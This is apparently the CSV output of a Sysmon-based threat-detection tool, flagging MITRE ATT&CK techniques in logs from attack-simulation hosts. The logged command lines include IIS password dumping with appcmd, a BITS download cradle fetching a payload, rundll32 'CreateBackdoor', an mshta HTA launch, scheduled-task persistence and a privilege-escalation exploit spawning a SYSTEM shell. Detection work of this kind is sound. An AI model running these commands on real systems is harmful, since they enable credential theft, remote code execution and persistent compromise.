SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + 
C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + 
C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5961 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.433 + 365ABB72-3D6F-5CEB-0000-00100FC7FF00 + 2168 + 
C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112972 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-10 00:09:43.370 + 747F3D96-4647-5EB7-0000-0010B3454B01 + 7672 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + c:\Users\IEUser\Tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-3B92-5EB5-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-4640-5EB7-0000-0010EF364B01 + 372 + C:\Windows\System32\cmd.exe + c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5958 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.353 + 365ABB72-3D6F-5CEB-0000-00104FC3FF00 + 2484 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5951 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 10:16:50.403 + 747F3D96-B092-5D46-0000-001089041204 + 7792 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 
747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-B091-5D46-0000-001081F71104 + 820 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424076 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.394 + 747F3D96-51D0-5F93-0000-0010B2B35B00 + 5572 + C:\Windows\SysWOW64\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 339223 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-26 22:13:19.375 + 747F3D96-FF9D-5F1D-0000-00100AC62400 + 7400 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 127.0.0.1 + MSEDGEWIN10 + 49796 + + false + 127.0.0.1 + MSEDGEWIN10 + 445 + microsoft-ds + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5955 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.283 + 365ABB72-3D6F-5CEB-0000-00108FBFFF00 + 168 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 
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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source 
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 
"c:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112815 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-07 13:13:02.476 + 747F3D96-095E-5EB4-0000-0010D46F1800 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "c:\Windows\System32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-08F7-5EB4-0000-0020BAEC0200 + 0x2ecba + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-095E-5EB4-0000-001002511800 + 6396 + C:\Windows\System32\changepk.exe + "C:\Windows\system32\ChangePk.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 
+ 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5950 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 10:16:49.960 + 747F3D96-B091-5D46-0000-001081F71104 + 820 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-B080-5D46-0000-0010D4EA0F04 + 2112 + C:\Windows\System32\WSReset.exe + "C:\Windows\system32\WSReset.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339222 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-26 22:26:14.521 + 747F3D96-0306-5F1E-0000-0010E15F3100 + 3660 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-F938-5F1D-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-F938-5F1D-0000-00104B500000 + 584 + C:\Windows\System32\winlogon.exe + winlogon.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5991 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.475 + 365ABB72-3D70-5CEB-0000-0010F2EDFF00 + 4012 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". 
)" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5452 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:08:23.391 + 747F3D96-7937-5D45-0000-00100D290801 + 4192 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-7934-5D45-0000-0010CAB90701 + 7564 + C:\Windows\System32\consent.exe + consent.exe 896 272 00000280644BC500 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 
112969 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-10 00:09:36.703 + 747F3D96-4640-5EB7-0000-0010EF364B01 + 372 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + c:\Users\IEUser\Tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-3B92-5EB5-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-4640-5EB7-0000-0010292D4B01 + 8028 + C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe + NetworkServiceExploit.exe -i -c "c:\Windows\System32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + 